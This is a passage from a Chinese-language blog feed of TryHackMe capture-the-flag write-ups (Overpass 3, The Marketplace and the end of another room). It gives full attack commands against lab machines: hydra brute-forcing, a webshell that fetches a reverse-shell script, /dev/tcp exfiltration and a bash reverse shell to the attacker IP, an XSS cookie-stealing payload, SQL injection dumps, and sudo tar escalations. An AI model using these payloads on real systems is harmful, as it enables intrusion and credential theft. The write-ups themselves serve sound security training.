&lt;li&gt;21&lt;/li&gt;
&lt;li&gt;22&lt;/li&gt;
&lt;li&gt;80&lt;code&gt;nmap -A -p21,22,80 10.10.164.54&lt;/code&gt;- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/46028-fX6jwMc.png"&gt;&lt;/li&gt;
&lt;li&gt;FTP 可以匿名登入 !!觀察首頁- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/b7d83-TcipcZA.jpg"&gt;&lt;/li&gt;
&lt;li&gt;沒啥東東dirsearch- 也沒啥東東&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/6e58f-e6Yx7KD.png"&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="ftp-anonymous-login"&gt;FTP Anonymous login&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;FTP 登入&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/4a8f3-eDhLW7K.png"&gt;&lt;/li&gt;
&lt;li&gt;裡面有兩ㄍ檔案都載下來FTP 檔案- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/49c10-OHreXEW.png"&gt;作者是 &lt;code&gt;lin&lt;/code&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/26a16-jeU8FFE.png"&gt;- 看起來是一個密碼表&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="爆破密碼"&gt;爆破密碼&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;hydra -l 'lin' -P locks.txt ssh://10.10.164.54&lt;/code&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/e6e7a-V5VCmJA.png"&gt;&lt;/li&gt;
&lt;li&gt;帳號 : &lt;code&gt;lin&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;密碼 : &lt;code&gt;RedDr4gonSynd1cat3&lt;/code&gt;SSH 登入成功- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/c0fcc-EMmqpa7.png"&gt;取得 user flag- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/4d939-y5O6qRV.png"&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="提權"&gt;提權&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;起手式 &lt;code&gt;sudo -l&lt;/code&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/9abbe-VrYqxmz.png"&gt;&lt;/li&gt;
&lt;li&gt;發現可以用 &lt;code&gt;sudo tar&lt;/code&gt;GTFOBins 尋找 tar sudo 提權- &lt;a href="https://gtfobins.github.io/gtfobins/tar/#sudo"&gt;https://gtfobins.github.io/gtfobins/tar/#sudo&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh&lt;/code&gt;提權完畢，取得 root flag- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/9fbce-0kebDB6.png"&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Overpass 3 (Try Hack Me Writeup)</title><link>http://blog.stevenyu.tw/2021/08/18/overpass-3-try-hack-me-writeup/</link><pubDate>Wed, 18 Aug 2021 13:10:00 +0800</pubDate><guid>http://blog.stevenyu.tw/2021/08/18/overpass-3-try-hack-me-writeup/</guid><description>&lt;blockquote&gt;
&lt;/blockquote&gt;
&lt;p&gt;URL : &lt;a href="https://tryhackme.com/room/overpass3hosting"&gt;https://tryhackme.com/room/overpass3hosting&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;IP : 10.10.208.60&lt;/p&gt;
&lt;h2 id="recon"&gt;Recon&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;先掃 Port&lt;code&gt;rustscan -a 10.10.208.60&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/e7d2d-rD5MaOl.png"&gt;嘗試 FTP Anonymous 登入- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/dca3a-S4radmP.png"&gt;&lt;/li&gt;
&lt;li&gt;發現不行觀察首頁- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/53f5b-M2jslnM.png"&gt;掃目錄- &lt;code&gt;python3 dirsearch.py -u http://10.10.208.60/&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;/backups/&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;找到一包 Backup&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/1aa57-yoQyHaf.png"&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="gpg-解密"&gt;GPG 解密&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;觀察 Backup&lt;code&gt;wget http://10.10.208.60/backups/backup.zip&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;裡面有兩個檔案&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/d2e8e-8jvPuov.png"&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/cee4e-E0JaxzX.png"&gt;&lt;/li&gt;
&lt;li&gt;gpg 加密後的檔案跟它的 key&lt;code&gt;gpg --import priv.key&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;gpg --output ./a.xlsx --decrypt ./CustomerDetails.xlsx.gpg&lt;/code&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/a98e7-QYAREMT.png"&gt;解開後是一個 Excel 表格- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/25e42-FN7APLv.png"&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;paradox:ShibesAreGreat123&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;0day:OllieIsTheBestDog&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;muirlandoracle:A11D0gsAreAw3s0me&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="爆破密碼"&gt;爆破密碼&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;有一連串的帳號跟密碼，試著用 Hydra 爆破 SSH&lt;code&gt;hydra -L user.txt -P pass.txt ssh://10.10.208.60&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/dfc50-PuFlIx6.png"&gt;&lt;/li&gt;
&lt;li&gt;發現 SSH 不能用密碼登入試著爆破 FTP- &lt;code&gt;hydra -L user.txt -P pass.txt ftp://10.10.208.60&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/277e2-Y6IYkJ7.png"&gt;&lt;/li&gt;
&lt;li&gt;找到了一組帳密可以使用&lt;code&gt;paradox:ShibesAreGreat123&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="ftp-2-webshell"&gt;FTP 2 Webshell&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;嘗試登入 FTP&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/c3dd5-77Rwv2x.png"&gt;&lt;/li&gt;
&lt;li&gt;發現看起來是 webroot&lt;/li&gt;
&lt;li&gt;放隻 Webshell 上去&lt;/li&gt;
&lt;li&gt;&lt;code&gt;put webshell.php&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/871ac-m1YHIcT.png"&gt;&lt;/li&gt;
&lt;li&gt;發現成功惹!!使用 Webshell- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/e9297-bpVLmNJ.png"&gt;&lt;/li&gt;
&lt;li&gt;放 Reverse shellhttp://10.10.208.60/webshell.php?A=curl%20-o%20%20/tmp/s%2010.13.21.55:8000/s&lt;/li&gt;
&lt;li&gt;本地開 nc -nlvp 7877&lt;/li&gt;
&lt;li&gt;http://10.10.208.60/webshell.php?A=bash%20/tmp/s&lt;/li&gt;
&lt;li&gt;收到 Reverse shell&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/cb27f-cFAOx7B.png"&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="提權"&gt;提權&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;轉互動式 shell&lt;code&gt;python3 -c 'import pty; pty.spawn(&amp;quot;/bin/bash&amp;quot;)'&lt;/code&gt;找 Web Flag- &lt;code&gt;find / -iname '*flag*' -print 2&amp;gt;/dev/null&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;找到在 &lt;code&gt;/usr/share/httpd/web.flag&lt;/code&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/d6d2f-Rb4zfZR.png"&gt;&lt;code&gt;thm{0ae72f7870c3687129f7a824194be09d}&lt;/code&gt;準備 Linpeas- &lt;code&gt;curl -o linpeas.sh 10.13.21.55:8000/linpeas.sh&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;bash linpeas.sh&lt;/code&gt;Sudo version 1.8.29發現 nfs 很可疑，但我們先繼續看下去- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/9c131-wufaUIi.png"&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe"&gt;https://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe&lt;/a&gt;發現幾個檔案可以 setuid- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/50c4c-YS20qF5.png"&gt;&lt;/li&gt;
&lt;li&gt;但都不能利用發現 nfs 如果需要利用，需要用 showmount，但電腦裡沒有- 自己載一包來放著&lt;/li&gt;
&lt;li&gt;&lt;code&gt;curl -o ./showmount http://10.13.21.55:8000/showmount&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;但 run 起來都失敗 QQ發現根目錄有奇怪的檔案- &lt;code&gt;/.autorelabel&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/56d41-h35DLB7.png"&gt;&lt;/li&gt;
&lt;li&gt;用 nc 傳出來觀察&lt;/li&gt;
&lt;li&gt;&lt;code&gt;cat .autorelabel &amp;gt; /dev/tcp/10.13.21.55/1234&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;發現裡面是空的 QQ突然想到可能可以切換使用者- 因為前面我們 Excel 有密碼&lt;/li&gt;
&lt;li&gt;&lt;code&gt;su paradox&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/897f4-Sve53hC.png"&gt;&lt;/li&gt;
&lt;li&gt;切換使用者成功&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="二次提權"&gt;二次提權&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;基本上我們猜測接下來就要使用 nfs 的漏洞，但是我們一開始 nfs 在掃 port 時並沒有掃到，因此猜測它只開在 local，我們來掃掃看 local 的 port準備 nmap binaryhttps://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/nmap掃下去- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/7929d-Rvfodoz.png"&gt;&lt;/li&gt;
&lt;li&gt;找到 nfs 開在 2049 port觀察發現 paradox 的 &lt;code&gt;.ssh&lt;/code&gt; 只有 public key- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/1cd9e-wQh4gvk.png"&gt;&lt;/li&gt;
&lt;li&gt;好ㄉ沒啥用 = =本地端有開 nfs 但我們權限很低，那我們可以把 nfs 給用 port forwarding 打出來，使用 chisel- &lt;a href="https://github.com/jpillora/chisel"&gt;https://github.com/jpillora/chisel&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;curl http://10.13.21.55:8000/chisel -o chisel&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;chmod +x chisel&lt;/code&gt;輸入指令- 攻擊機 : &lt;code&gt;./chisel server --reverse -p 7414&lt;/code&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/4e7fc-vnSOu9o.png"&gt;靶機 : &lt;code&gt;./chisel client 10.13.21.55:7414 R:2049:127.0.0.1:2049&lt;/code&gt;- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/645eb-qVIbN7f.png"&gt;用 nmap 掃攻擊機看看有沒有真的打通- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/91111-miQAQB8.png"&gt;把 nfs mount 到本機- &lt;code&gt;sudo mount -t nfs localhost:/ mount/&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/2e4dd-Zt6Z0hF.png"&gt;發現 mount 成功- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/4912d-b4HeVgR.png"&gt;&lt;/li&gt;
&lt;li&gt;裡面有 ssh 的 key，所以我們可以複製出來直接用 james 的 ssh 進行登入&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/e0f98-JHhPHll.png"&gt;&lt;/li&gt;
&lt;li&gt;也找到了 User 的 Flag在攻擊機 mount 的 nfs 目錄- 直接複製自己的 &lt;code&gt;/bin/bash&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;給它 +s 提供 suid&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/36340-WbW1ohS.png"&gt;再用 james 進行執行- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/7fe92-KKhTeTA.png"&gt;&lt;/li&gt;
&lt;li&gt;發現怎麼還是 james QQ再回來攻擊機 chown 把 bash 的 owner 改 root- 就可以ㄌ!!&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/1c38e-FStYNoX.png"&gt;Root flag- &lt;code&gt;thm{a4f6adb70371a4bceb32988417456c44}&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/9976b-I99be39.png"&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="學到ㄌ"&gt;學到ㄌ&lt;/h2&gt;
&lt;p&gt;Port forwarding&lt;br&gt;
NFS 提權&lt;br&gt;
SUID 要 own=root才能用&lt;/p&gt;</description></item><item><title>The Marketplace (Try Hack Me Writeup)</title><link>http://blog.stevenyu.tw/2021/08/17/the-marketplace-try-hack-me-writeup/</link><pubDate>Tue, 17 Aug 2021 13:27:00 +0800</pubDate><guid>http://blog.stevenyu.tw/2021/08/17/the-marketplace-try-hack-me-writeup/</guid><description>&lt;blockquote&gt;
&lt;/blockquote&gt;
&lt;p&gt;URL : &lt;a href="https://tryhackme.com/room/marketplace"&gt;https://tryhackme.com/room/marketplace&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;IP : 10.10.74.8&lt;/p&gt;
&lt;h2 id="recon"&gt;Recon&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;首先先掃 Port&lt;code&gt;rustscan -a 10.10.74.8 -r 1-65535&lt;/code&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/65f49-THfTPBa.png"&gt;&lt;/li&gt;
&lt;li&gt;有開 22 80 32768&lt;code&gt;nmap -A -p22,80,32768 10.10.74.8&lt;/code&gt;- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/efe1f-DQEPjj6.png"&gt;觀察首頁- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/c9b89-WZZdAkU.png"&gt;&lt;/li&gt;
&lt;li&gt;感覺滿廉價ㄉQQ掃目錄- &lt;code&gt;python3 dirsearch.py -u http://10.10.74.8/``robots.txt&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;login&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;signup&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/7d845-WTfL2Io.png"&gt;嘗試註冊- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/994f8-kyz3rGk.png"&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;meow&lt;/code&gt; / &lt;code&gt;meow&lt;/code&gt;嘗試貼文- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/2727d-8ivNagm.png"&gt;&lt;/li&gt;
&lt;li&gt;發現下面說不能PO檔案，感覺有埋梗&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/f2a23-NBrphH9.png"&gt;用 F12 把 disable 拔掉再測- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/46638-5IWEXkh.png"&gt;觀察 &lt;code&gt;robots.txt&lt;/code&gt;- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/ad2b3-qs3uPFx.png"&gt;觀察 Session- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/3b778-6aKjy8x.png"&gt;&lt;/li&gt;
&lt;li&gt;看起來很 Base64&lt;code&gt;eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjQsInVzZXJuYW1lIjoibWVvdyIsImFkbWluIjpmYWxzZSwiaWF0IjoxNjI5MDk5NDQwfQ.6MNSd_Wf1ytqceTjhWWGEbB4AhzTHFshHCLIeVF_Zeo&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;解碼後看起來是 JWT&lt;code&gt;{&amp;quot;alg&amp;quot;:&amp;quot;HS256&amp;quot;,&amp;quot;typ&amp;quot;:&amp;quot;JWT&amp;quot;}{&amp;quot;userId&amp;quot;:4,&amp;quot;username&amp;quot;:&amp;quot;meow&amp;quot;,&amp;quot;admin&amp;quot;:false,&amp;quot;iat&amp;quot;:1629099440}5'YrN8VXa!1Ų,^&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="xss"&gt;XSS&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;發現 Po 文處可以 XSS&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/76313-LVtMQ7d.png"&gt;寫 Payload 偷餅乾- &lt;code&gt;new Image().src=&amp;quot;http://10.13.21.55:1234/&amp;quot;+document.cookie&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/1d4a7-h6njKX1.png"&gt;回報給管理員- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/518a8-qrvN6r7.png"&gt;用 &lt;code&gt;nc -l 1234&lt;/code&gt; 來接- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/e351b-mJaHJvK.png"&gt;&lt;/li&gt;
&lt;li&gt;收到管理員的餅乾&lt;code&gt;GET /token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjIsInVzZXJuYW1lIjoibWljaGFlbCIsImFkbWluIjp0cnVlLCJpYXQiOjE2MjkxMDAxOTN9.f-eVVqF1AnFJEeuam97hn-Xz3fFNbQAJYTKrsDukzrU HTTP/1.1&lt;/code&gt;使用管理員帳號登入- 把自己的餅乾換成管理員的&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/93d77-ISy8k0G.png"&gt;首頁- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/8a937-1XSphjU.png"&gt;取得 Flag1- &lt;code&gt;THM{c37a63895910e478f28669b048c348d5}&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="sqli"&gt;SQLi&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;發現看使用者這邊可以用 SQL injection&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/e598b-17Bjunz.png"&gt;點進去之後，透過 F12 複製成 curl 再轉 python 的 request- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/9091a-Z9wlSre.png"&gt;&lt;/li&gt;
&lt;li&gt;測了一陣子發現空白要用 &lt;code&gt;/**/&lt;/code&gt; 來繞&lt;code&gt;&amp;quot;-1/**/UNION/**/SELECT/**/1,2,3,4/**/--&amp;quot;)&lt;/code&gt;爆 db- &lt;code&gt;p = &amp;quot;-1 UNION SELECT 1,group_concat(schema_name),3,4 FROM information_schema.schemata --&amp;quot;&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/22f05-bSvyH76.png"&gt;&lt;/li&gt;
&lt;li&gt;兩個 DB&lt;code&gt;information_schema&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;marketplace&lt;/code&gt;先關注這個爆 table- &lt;code&gt;p = &amp;quot;-1 UNION SELECT 1,group_concat(table_name),3,4 FROM information_schema.tables where table_schema='marketplace' --&amp;quot;&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/37dcc-L8MCiSc.png"&gt;&lt;/li&gt;
&lt;li&gt;發現有三張 table&lt;code&gt;items&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;messages&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;users&lt;/code&gt;爆 column- &lt;code&gt;p = &amp;quot;-1 UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.columns where table_schema='marketplace' --&amp;quot;&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/f11f3-A3Y7nW8.png"&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;id,author,title,description,image,id,user_from,user_to,message_content,is_read,id,username,password,isAdministrator&lt;/code&gt;應該需要觀察的是 &lt;code&gt;username&lt;/code&gt; 跟 &lt;code&gt;password&lt;/code&gt;選帳號- &lt;code&gt;p = &amp;quot;-1 UNION SELECT 1,group_concat(username),3,4 FROM marketplace.users --&amp;quot;&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;jake,meow,michael,system&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/b10f0-b6XfCbO.png"&gt;選密碼- &lt;code&gt;p = &amp;quot;-1 UNION SELECT 1,group_concat(password),3,4 FROM marketplace.users --&amp;quot;&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/600dc-WfBQ3kh.png"&gt;&lt;/li&gt;
&lt;li&gt;看起來有過 hash&lt;/li&gt;
&lt;li&gt;把他大致整理一下&lt;code&gt;$2b$10$83pRYaR/d4ZWJVEex.lxu.Xs1a/TNDBWIUmB4z.R0DT0MSGIGzsgW, $2b$10$yaYKN53QQ6ZvPzHGAlmqiOwGt8DXLAO5u2844yUlvu2EXwQDGf/1q $2b$10$/DkSlJB4L85SCNhS.IxcfeNpEBn.VkyLvQ2Tk9p2SDsiVcCRb4ukG $2b$10$FStzuEGFk9JpOnigl2gbEuE2rRp27psGUS0UuztTtxbZPFW/Wtn4m&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;查詢發現是 bcrypthttps://bcrypt-generator.com/&lt;/li&gt;
&lt;li&gt;而且可以測試其中一個是我自己註冊的 &lt;code&gt;meow&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/4a2dd-jhHGnDb.png"&gt;爆密碼- &lt;code&gt;john password_hash.txt --wordlist=/opt/rockyou.txt&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;hashcat -m 3200 password_hash.txt rockyou.txt&lt;/code&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/a60f4-y5YqjAf.png"&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/bf003-ywGcdes.png"&gt;中研院超級電腦的兩張 V100 吃滿要跑 3 小時，不太合理繼續 SQLi- &lt;code&gt;p = &amp;quot;-1 UNION SELECT 1,group_concat(message_content),3,4 FROM marketplace.messages --&amp;quot;&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;噴出以下內容&lt;code&gt;User Hello! An automated system has detected your SSH password is too weak and needs to be changed. You have been generated a new temporary password. Your new password is: @b_ENXkGYUCAv3zJ,&amp;amp;lt;script&amp;amp;gt;alert(1)&amp;amp;lt;/script&amp;amp;gt;,Thank you for your report. One of our admins will evaluate whether the listing you reported breaks our guidelines and will get back to you via private message. Thanks for using The Marketplace!,Thank you for your report. We have been unable to review the listing at this time. Something may be blocking our ability to view it, such as alert boxes, which are blocked in our employee&amp;amp;#39;s browsers.,Thank you for your report. One of our admins will evaluate whether the listing you reported breaks our guidelines and will get back to you via private message. Thanks for using The Marketplace!,Thank you for your report. We have been unable to review the listing at this time. Something may be blocking our ability to view it, such as alert boxes, which are blocked in our employee&amp;amp;#39;s browsers.,Thank you for your repor&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;看到一段看起來很像密碼的東西&lt;code&gt;@b_ENXkGYUCAv3zJ&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="ssh"&gt;SSH&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;我們有 3 個 user&lt;code&gt;jake&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;michael&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;system&lt;/code&gt;雖然可以徒手戳一下就好，但我今天想用 Hydra- &lt;code&gt;hydra -L user.txt -P password.txt ssh://10.10.74.8&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/2d616-0vy8paN.png"&gt;噴出的結果是 jake&lt;code&gt;jake&lt;/code&gt; : &lt;code&gt;@b_ENXkGYUCAv3zJ&lt;/code&gt;SSH 登入成功- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/e0bc0-pPnT6TI.png"&gt;&lt;/li&gt;
&lt;li&gt;取得 user keyTHM{c3648ee7af1369676e3e4b15da6dc0b4}&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="提權"&gt;提權&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;起手式先 &lt;code&gt;sudo -l&lt;/code&gt; 一波&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/6eddb-kPbupbL.png"&gt;&lt;/li&gt;
&lt;li&gt;看起來是很老梗的 sudo 備份 ㄇ如果是的話我們只要戳個 Reverse shell&lt;code&gt;echo &amp;quot;bash -c 'bash -i &amp;gt;&amp;amp; /dev/tcp/10.13.21.55/7877 0&amp;gt;&amp;amp;1'&amp;quot; &amp;gt;&amp;gt; /opt/backups/backup.sh&lt;/code&gt;就可以打完收工ㄌ但前題是我們需要有權限修改這個 sh- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/aa31a-r7W7QKx.png"&gt;看樣子不行QQ，我們不是賣口 QQ準備 Linpeas- &lt;code&gt;wget 10.13.21.55:8000/linpeas.sh&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;發現 sudo version 1.8.21p2https://www.exploit-db.com/exploits/47502&lt;/li&gt;
&lt;li&gt;但看起來不好用發現一包 backup 檔案- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/d2e5d-b7pkxQY.png"&gt;&lt;/li&gt;
&lt;li&gt;用 nc 傳出來&lt;code&gt;nc -l 1234 &amp;gt; backup.tar&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;cat backup.tar &amp;gt; /dev/tcp/10.13.21.55/1234&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;發現裡面都空ㄉㄍ騙我&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/4cabc-ujraWYL.png"&gt;回想起 &lt;code&gt;backup.sh&lt;/code&gt; 他後面接了一個 &lt;code&gt;*&lt;/code&gt;- 這個時候可以套用 &lt;code&gt;tar-wildcard-injection&lt;/code&gt;ref : &lt;a href="https://mqt.gitbook.io/oscp-notes/tar-wildcard-injection"&gt;https://mqt.gitbook.io/oscp-notes/tar-wildcard-injection&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;簡單來說 tar 會把後面的 * 的東西直接串起來當指令執行&lt;code&gt;echo a &amp;gt; '--checkpoint=1'``echo a &amp;gt; '--checkpoint-action=exec=sh script.sh'&lt;/code&gt;echo whoami &amp;gt; script.sh&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/413ac-iJOCoN4.png"&gt;用 賣口權限執行- &lt;code&gt;sudo -u michael /opt/backups/backup.sh&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;發現可以成功!!!&lt;/li&gt;
